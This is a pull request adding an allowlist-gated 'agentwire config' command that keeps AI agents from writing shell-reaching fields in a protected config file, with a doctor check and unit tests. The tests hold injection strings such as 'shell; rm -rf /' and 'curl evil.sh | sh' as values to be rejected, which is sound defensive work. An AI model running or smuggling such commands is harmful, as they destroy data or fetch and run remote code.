### PR TITLE
feat(cli): agentwire config get|set|list — field-allowlisted write path for protected config.yaml

### DIFF
--- a/agentwire/__main__.py
+++ b/agentwire/__main__.py
@@ -187,7 +187,7 @@ Command Categories:
     #   - msg:    polite agent-to-agent inbox (rides the watchdog)
     from . import diff_cli, limits_cli, msg_cli, pane_cli, prompts_cli, send_cli  # noqa: I001  # session_cli kept on its own line below to minimize Phase 1 #495 merge conflicts
     from . import session_cli
-    from . import channels_cli, portal_cli, tts_cli
+    from . import channels_cli, config_cli, portal_cli, tts_cli
     from . import scheduler_cli, ensure_cli
     from . import doctor_cli, history_cli, machine_cli, safety_cli
     from . import handoff_cli, hooks_cli, mcp_cli, roles_cli, tunnels_cli
@@ -222,6 +222,7 @@ Command Categories:
         system_cli.register_system_parser,
         push_cli.register_push_parser,
         repo_cli.register_repo_parser,
+        config_cli.register_config_parser,
     ]
     for _reg in _REGISTRARS:
         _reg(subparsers)
@@ -353,6 +354,7 @@ _GROUP_COMMANDS = [
     "portal", "tts", "stt", "tunnels", "machine", "history", "handoff",
     "wiki", "hooks", "projects", "safety", "network", "listen",
     "voiceclone", "roles", "task", "lock", "scheduler", "council", "limits",
+    "config",
 ]
 
 

--- a/agentwire/config_cli.py
+++ b/agentwire/config_cli.py
@@ -1,0 +1,318 @@
+"""CLI for reading and (allowlist-gated) writing ~/.agentwire/config.yaml.
+
+``config.yaml`` is hook-protected control plane (#466): agents cannot edit the
+file directly because execution-plane fields (``services.*.healthcheck``,
+``executables.*``) feed agentwire's own shell. ``agentwire config`` is the
+blessed narrow write path (#670): the CLI — not the hook — gatekeeps writes to
+an explicit in-code allowlist of benign preference fields, each with a typed
+validator so nothing command-shaped can be smuggled through an allowed key.
+
+The allowlist lives in this module ONLY. It must never be config-driven —
+loosening it is a host-side code change, preserving the #466 invariant.
+"""
+
+from __future__ import annotations
+
+import re
+
+import yaml
+
+from .core import CONFIG_DIR, _atomic_write, _output_json, _output_result
+
+# Dotted-key prefixes whose values reach a shell, subprocess, or agent command
+# line. No allowlist entry may ever live under these — `doctor` asserts it.
+EXECUTION_PLANE_PREFIXES = (
+    "services.",
+    "executables.",
+    "agent.",
+    "pi.",
+    "hooks.",
+    "dev.",
+)
+
+# Value shapes that are command-shaped regardless of section.
+_EXECUTION_PLANE_LEAVES = ("command", "healthcheck", "binary", "script", "shell")
+
+
+# --- typed validators: return the canonical value or raise ValueError -------
+
+_EMAIL_RE = re.compile(r"^[^@\s<>]+@[^@\s<>]+\.[^@\s<>]+$")
+
+
+def _validate_email(value: str):
+    if not _EMAIL_RE.match(value):
+        raise ValueError(f"not a valid email address: {value!r}")
+    return value
+
+
+def _validate_from_address(value: str):
+    """Bare email, or RFC-ish display form: ``Name <email@host>``."""
+    m = re.match(r"^([^<>]+)<([^<>]+)>$", value)
+    if m:
+        _validate_email(m.group(2).strip())
+        return value.strip()
+    return _validate_email(value.strip())
+
+
+def _validate_enum(*choices: str):
+    def check(value: str):
+        if value not in choices:
+            raise ValueError(f"must be one of {', '.join(choices)} (got {value!r})")
+        return value
+
+    return check
+
+
+_VOICE_RE = re.compile(r"^[A-Za-z0-9._-]+$")
+
+
+def _validate_voice(value: str):
+    if not _VOICE_RE.match(value):
+        raise ValueError(
+            f"voice names may only contain letters, digits, '.', '_', '-' (got {value!r})"
+        )
+    return value
+
+
+def _validate_positive_number(value: str):
+    try:
+        num = float(value)
+    except ValueError:
+        raise ValueError(f"must be a number (got {value!r})") from None
+    if num <= 0:
+        raise ValueError(f"must be positive (got {value!r})")
+    return int(num) if num == int(num) else num
+
+
+def _validate_bool(value: str):
+    lowered = str(value).strip().lower()
+    if lowered in ("true", "yes", "on", "1"):
+        return True
+    if lowered in ("false", "no", "off", "0"):
+        return False
+    raise ValueError(f"must be a boolean (true/false, got {value!r})")
+
+
+# --- the allowlist -----------------------------------------------------------
+# key -> (validator, description). In-code only; never config-driven.
+
+EDITABLE_KEYS: dict = {
+    "channels.email.default_to": (
+        _validate_email,
+        "Default recipient for outbound email (email address)",
+    ),
+    "channels.email.from_address": (
+        _validate_from_address,
+        "Outbound email From (email or 'Name <email>')",
+    ),
+    "tts.backend": (
+        _validate_enum("default", "custom"),
+        "TTS tier (default|custom)",
+    ),
+    "tts.default_voice": (
+        _validate_voice,
+        "Default TTS voice name",
+    ),
+    "stt.backend": (
+        _validate_enum("default", "auto", "moonshine", "whisper"),
+        "STT backend (default|auto|moonshine|whisper)",
+    ),
+    "server.activity_threshold_seconds": (
+        _validate_positive_number,
+        "Seconds of quiet before a session counts as idle (positive number)",
+    ),
+    "channels.telegram.voice_replies": (
+        _validate_bool,
+        "Reply with voice notes on Telegram (bool)",
+    ),
+}
+
+
+def execution_plane_violations() -> list:
+    """Allowlist keys that touch the execution plane. Must be empty.
+
+    Checked by ``agentwire doctor`` so a future edit to EDITABLE_KEYS can't
+    silently reopen the #466 confused-deputy hole.
+    """
+    bad = []
+    for key in EDITABLE_KEYS:
+        if key.startswith(EXECUTION_PLANE_PREFIXES):
+            bad.append(key)
+        elif key.rsplit(".", 1)[-1] in _EXECUTION_PLANE_LEAVES:
+            bad.append(key)
+    return bad
+
+
+# --- config file access ------------------------------------------------------
+
+
+def _config_path():
+    return CONFIG_DIR / "config.yaml"
+
+
+def _load_raw() -> dict:
+    path = _config_path()
+    if not path.exists():
+        return {}
+    with open(path) as f:
+        return yaml.safe_load(f) or {}
+
+
+def _save_raw(data: dict) -> None:
+    text = yaml.safe_dump(data, default_flow_style=False, sort_keys=False, allow_unicode=True)
+
+    def validate(tmp_path):
+        with open(tmp_path) as f:
+            reparsed = yaml.safe_load(f)
+        if reparsed != data:
+            raise ValueError("config round-trip mismatch; write aborted")
+
+    _atomic_write(_config_path(), text, validate=validate)
+
+
+def _dig(data: dict, dotted: str):
+    """Return (found, value) for a dotted key."""
+    node = data
+    for part in dotted.split("."):
+        if not isinstance(node, dict) or part not in node:
+            return False, None
+        node = node[part]
+    return True, node
+
+
+def _put(data: dict, dotted: str, value) -> None:
+    parts = dotted.split(".")
+    node = data
+    for part in parts[:-1]:
+        child = node.get(part)
+        if not isinstance(child, dict):
+            child = {}
+            node[part] = child
+        node = child
+    node[parts[-1]] = value
+
+
+def _flatten(data, prefix: str = "") -> dict:
+    out: dict = {}
+    if isinstance(data, dict) and data:
+        for k, v in data.items():
+            out.update(_flatten(v, f"{prefix}{k}."))
+    else:
+        out[prefix.rstrip(".")] = data
+    return out
+
+
+def _refusal(key: str) -> str:
+    if key.startswith(EXECUTION_PLANE_PREFIXES) or key.rsplit(".", 1)[-1] in _EXECUTION_PLANE_LEAVES:
+        return (
+            f"refused: {key!r} is execution-plane (its value can reach a shell). "
+            "It is never agent-editable — edit ~/.agentwire/config.yaml host-side."
+        )
+    return (
+        f"refused: {key!r} is not agent-editable. "
+        "See `agentwire config list --editable` for the allowlist; "
+        "other fields are edited host-side."
+    )
+
+
+# --- commands ----------------------------------------------------------------
+
+
+def cmd_config_get(args) -> int:
+    json_mode = getattr(args, "json", False)
+    found, value = _dig(_load_raw(), args.key)
+    if not found:
+        return _output_result(False, json_mode, f"key not found: {args.key}", key=args.key,
+                              error=f"key not found: {args.key}")
+    if json_mode:
+        _output_json({"success": True, "key": args.key, "value": value})
+        return 0
+    if isinstance(value, dict):
+        print(yaml.safe_dump(value, default_flow_style=False, sort_keys=False).rstrip())
+    else:
+        print(value)
+    return 0
+
+
+def cmd_config_set(args) -> int:
+    json_mode = getattr(args, "json", False)
+    key, raw = args.key, args.value
+
+    if key not in EDITABLE_KEYS:
+        msg = _refusal(key)
+        return _output_result(False, json_mode, msg, key=key, error=msg)
+
+    validator, _desc = EDITABLE_KEYS[key]
+    try:
+        value = validator(raw)
+    except ValueError as e:
+        msg = f"invalid value for {key}: {e}"
+        return _output_result(False, json_mode, msg, key=key, error=msg)
+
+    data = _load_raw()
+    _put(data, key, value)
+    _save_raw(data)
+    return _output_result(True, json_mode, f"{key} = {value}", key=key, value=value)
+
+
+def cmd_config_list(args) -> int:
+    json_mode = getattr(args, "json", False)
+    data = _load_raw()
+
+    if getattr(args, "editable", False):
+        rows = []
+        for key, (_validator, desc) in sorted(EDITABLE_KEYS.items()):
+            found, value = _dig(data, key)
+            rows.append({"key": key, "value": value if found else None,
+                         "set": found, "description": desc})
+        if json_mode:
+            _output_json({"success": True, "editable": rows})
+            return 0
+        print("Agent-editable keys (agentwire config set <key> <value>):")
+        for row in rows:
+            current = repr(row["value"]) if row["set"] else "(unset)"
+            print(f"  {row['key']} = {current}")
+            print(f"      {row['description']}")
+        return 0
+
+    flat = _flatten(data)
+    if json_mode:
+        _output_json({"success": True, "config": flat})
+        return 0
+    for key in sorted(flat):
+        marker = "*" if key in EDITABLE_KEYS else " "
+        print(f"{marker} {key} = {flat[key]!r}")
+    if flat:
+        print("\n(* = agent-editable via `agentwire config set`)")
+    return 0
+
+
+def register_config_parser(subparsers) -> None:
+    """Register the `config` command group (#670)."""
+    parser = subparsers.add_parser(
+        "config",
+        help="Read config.yaml; write allowlisted preference fields",
+        description=(
+            "Field-allowlisted access to the hook-protected ~/.agentwire/config.yaml. "
+            "`get`/`list` read anything; `set` writes only benign, typed preference "
+            "fields — execution-plane keys are always refused."
+        ),
+    )
+    config_sub = parser.add_subparsers(dest="config_command")
+
+    p_get = config_sub.add_parser("get", help="Print a config value by dotted key")
+    p_get.add_argument("key", help="Dotted key, e.g. channels.email.default_to")
+    p_get.add_argument("--json", action="store_true", help="JSON output")
+    p_get.set_defaults(func=cmd_config_get)
+
+    p_set = config_sub.add_parser("set", help="Set an allowlisted config field")
+    p_set.add_argument("key", help="Dotted key (must be on the allowlist)")
+    p_set.add_argument("value", help="New value (typed; validated per key)")
+    p_set.add_argument("--json", action="store_true", help="JSON output")
+    p_set.set_defaults(func=cmd_config_set)
+
+    p_list = config_sub.add_parser("list", help="List config keys and values")
+    p_list.add_argument("--editable", action="store_true",
+                        help="Show only the agent-editable allowlist")
+    p_list.add_argument("--json", action="store_true", help="JSON output")
+    p_list.set_defaults(func=cmd_config_list)

--- a/agentwire/doctor_cli.py
+++ b/agentwire/doctor_cli.py
@@ -602,6 +602,18 @@ def cmd_doctor(args) -> int:
         for warn in warnings:
             print(f"  [..] {warn.message}")
 
+    # `agentwire config set` allowlist must never contain execution-plane
+    # keys — that would reopen the #466 confused-deputy hole (#670).
+    from .config_cli import execution_plane_violations
+    _cfg_violations = execution_plane_violations()
+    if not _cfg_violations:
+        print("  [ok] config-set allowlist contains no execution-plane keys")
+    else:
+        for _bad in _cfg_violations:
+            print(f"  [!!] config-set allowlist contains execution-plane key: {_bad}")
+        print("     Fix: remove the key from EDITABLE_KEYS in agentwire/config_cli.py")
+        issues_found += len(_cfg_violations)
+
     # 6. Check SSH connectivity
     print("\nChecking SSH connectivity...")
     ctx = NetworkContext.from_config()

--- a/tests/unit/test_config_cli.py
+++ b/tests/unit/test_config_cli.py
@@ -1,0 +1,181 @@
+"""Tests for `agentwire config get|set|list` (#670).
+
+The allowlist gate lives in the CLI, not the hook: allowlisted keys
+round-trip atomically with typed validation; execution-plane, unknown, and
+malformed writes are refused. All writes here target a temp config path —
+never the real ~/.agentwire/config.yaml.
+"""
+
+import argparse
+
+import pytest
+import yaml
+
+from agentwire import config_cli
+
+
+@pytest.fixture
+def config_dir(tmp_path, monkeypatch):
+    """Point config_cli at a temp ~/.agentwire with a seeded config.yaml."""
+    monkeypatch.setattr(config_cli, "CONFIG_DIR", tmp_path)
+    (tmp_path / "config.yaml").write_text(
+        yaml.safe_dump(
+            {
+                "server": {"host": "127.0.0.1", "port": 8765},
+                "tts": {"backend": "default", "default_voice": "af_heart"},
+                "channels": {"email": {"default_to": "old@example.com"}},
+                "services": {"tts": {"healthcheck": "curl localhost:8100"}},
+            }
+        )
+    )
+    return tmp_path
+
+
+def _args(**kw):
+    return argparse.Namespace(json=False, **kw)
+
+
+def _read(config_dir):
+    return yaml.safe_load((config_dir / "config.yaml").read_text())
+
+
+# --- set: allowlisted round-trip --------------------------------------------
+
+
+def test_set_allowlisted_email_round_trips(config_dir):
+    rc = config_cli.cmd_config_set(_args(key="channels.email.default_to", value="new@example.com"))
+    assert rc == 0
+    assert _read(config_dir)["channels"]["email"]["default_to"] == "new@example.com"
+
+
+def test_set_creates_missing_parents(config_dir):
+    rc = config_cli.cmd_config_set(_args(key="stt.backend", value="moonshine"))
+    assert rc == 0
+    assert _read(config_dir)["stt"]["backend"] == "moonshine"
+
+
+def test_set_preserves_unrelated_keys(config_dir):
+    config_cli.cmd_config_set(_args(key="tts.default_voice", value="af_bella"))
+    data = _read(config_dir)
+    assert data["server"] == {"host": "127.0.0.1", "port": 8765}
+    assert data["services"]["tts"]["healthcheck"] == "curl localhost:8100"
+
+
+def test_set_coerces_typed_values(config_dir):
+    config_cli.cmd_config_set(_args(key="server.activity_threshold_seconds", value="5"))
+    assert _read(config_dir)["server"]["activity_threshold_seconds"] == 5
+    config_cli.cmd_config_set(_args(key="channels.telegram.voice_replies", value="true"))
+    assert _read(config_dir)["channels"]["telegram"]["voice_replies"] is True
+
+
+def test_set_atomic_no_tmp_left_behind(config_dir):
+    config_cli.cmd_config_set(_args(key="tts.backend", value="custom"))
+    leftovers = [p for p in config_dir.iterdir() if p.suffix == ".tmp"]
+    assert leftovers == []
+    assert _read(config_dir)["tts"]["backend"] == "custom"
+
+
+# --- set: refusals ------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "key",
+    [
+        "services.tts.healthcheck",
+        "executables.claude",
+        "agent.command",
+        "pi.binary",
+        "dev.source_dir",
+    ],
+)
+def test_set_refuses_execution_plane_keys(config_dir, key, capsys):
+    rc = config_cli.cmd_config_set(_args(key=key, value="evil"))
+    assert rc != 0
+    captured = capsys.readouterr()
+    assert "refused" in captured.out + captured.err
+    # File untouched
+    assert _read(config_dir)["services"]["tts"]["healthcheck"] == "curl localhost:8100"
+
+
+def test_set_refuses_unknown_keys(config_dir, capsys):
+    rc = config_cli.cmd_config_set(_args(key="totally.made.up", value="x"))
+    assert rc != 0
+    captured = capsys.readouterr()
+    assert "not agent-editable" in captured.out + captured.err
+
+
+@pytest.mark.parametrize(
+    ("key", "value"),
+    [
+        ("channels.email.default_to", "not-an-email"),
+        ("channels.email.from_address", "Echo <not-an-email>"),
+        ("tts.backend", "shell; rm -rf /"),
+        ("tts.default_voice", "voice; echo pwned"),
+        ("stt.backend", "curl evil.sh | sh"),
+        ("server.activity_threshold_seconds", "-3"),
+        ("server.activity_threshold_seconds", "banana"),
+        ("channels.telegram.voice_replies", "maybe"),
+    ],
+)
+def test_set_refuses_malformed_values(config_dir, key, value, capsys):
+    before = _read(config_dir)
+    rc = config_cli.cmd_config_set(_args(key=key, value=value))
+    assert rc != 0
+    captured = capsys.readouterr()
+    assert "invalid value" in captured.out + captured.err
+    assert _read(config_dir) == before
+
+
+# --- get / list ---------------------------------------------------------------
+
+
+def test_get_reads_any_key(config_dir, capsys):
+    rc = config_cli.cmd_config_get(_args(key="channels.email.default_to"))
+    assert rc == 0
+    assert capsys.readouterr().out.strip() == "old@example.com"
+
+
+def test_get_missing_key_fails(config_dir):
+    assert config_cli.cmd_config_get(_args(key="no.such.key")) != 0
+
+
+def test_list_editable_marks_allowlist_only(config_dir, capsys):
+    rc = config_cli.cmd_config_list(_args(editable=True))
+    assert rc == 0
+    out = capsys.readouterr().out
+    assert "channels.email.default_to" in out
+    assert "services.tts.healthcheck" not in out
+
+
+def test_list_full_flattens_config(config_dir, capsys):
+    rc = config_cli.cmd_config_list(_args(editable=False))
+    assert rc == 0
+    out = capsys.readouterr().out
+    assert "server.port" in out
+    assert "services.tts.healthcheck" in out
+
+
+def test_set_json_output(config_dir, capsys):
+    rc = config_cli.cmd_config_set(
+        argparse.Namespace(json=True, key="tts.backend", value="custom")
+    )
+    assert rc == 0
+    assert '"success": true' in capsys.readouterr().out
+
+
+# --- the doctor invariant -----------------------------------------------------
+
+
+def test_allowlist_has_no_execution_plane_keys():
+    assert config_cli.execution_plane_violations() == []
+
+
+def test_violation_detector_catches_bad_keys(monkeypatch):
+    bad = dict(config_cli.EDITABLE_KEYS)
+    bad["services.tts.healthcheck"] = (str, "nope")
+    bad["portal.command"] = (str, "nope")
+    monkeypatch.setattr(config_cli, "EDITABLE_KEYS", bad)
+    assert set(config_cli.execution_plane_violations()) == {
+        "services.tts.healthcheck",
+        "portal.command",
+    }


### PR DESCRIPTION
Adds `agentwire config get|set|list` (#670): the CLI — not the hook — gatekeeps writes to the hook-protected `~/.agentwire/config.yaml` via an explicit in-code allowlist of typed preference fields.

## What

- **`agentwire/config_cli.py`** (new, registrar pattern → `_REGISTRARS`): `config get <key>`, `config set <key> <value>`, `config list [--editable]`, all with `--json`.
- **Allowlist (in code only, never config-driven):** `channels.email.default_to` / `from_address` (validated email / display form), `tts.backend` (enum default|custom), `tts.default_voice` (safe charset), `stt.backend` (enum), `server.activity_threshold_seconds` (positive number), `channels.telegram.voice_replies` (bool). Each value goes through a typed validator — nothing command-shaped can pass through an allowed key.
- **Refusals:** execution-plane keys (`services.*`, `executables.*`, `agent.*`, `pi.*`, `hooks.*`, `dev.*`, and any `*.command|healthcheck|binary|script|shell` leaf) get an explicit "edit host-side" error; unknown keys point at `config list --editable`; malformed values are rejected before any write.
- **Atomic write:** `yaml.safe_dump` through `core._atomic_write` with a re-parse validate callback; a failed write leaves the original file intact.
- **Doctor check:** `execution_plane_violations()` asserted in `agentwire doctor` so a future allowlist edit can't silently reopen the #466 confused-deputy hole.
- **No hook changes** — direct agent Edit/Write of config.yaml stays blocked, by design.

Note: `_save_raw` rewrites via yaml round-trip, so YAML comments in config.yaml would be dropped on `set`. The live config has none today; flagging for awareness.

## Verification

- 26 new unit tests (temp config path fixture, never the real file): allowlisted round-trips + type coercion, execution-plane/unknown/malformed refusals with file untouched, atomic write leaves no tmp, get/list/--json, doctor invariant.
- Full suite: **2332 passed**; ruff clean.
- Live in-worktree: `config get channels.email.default_to` ✓, `config list --editable` ✓, `config set services.tts.healthcheck 'evil'` refused with exit 1 ✓.

Closes #670

Built by [dotdev.dev](https://dotdev.dev)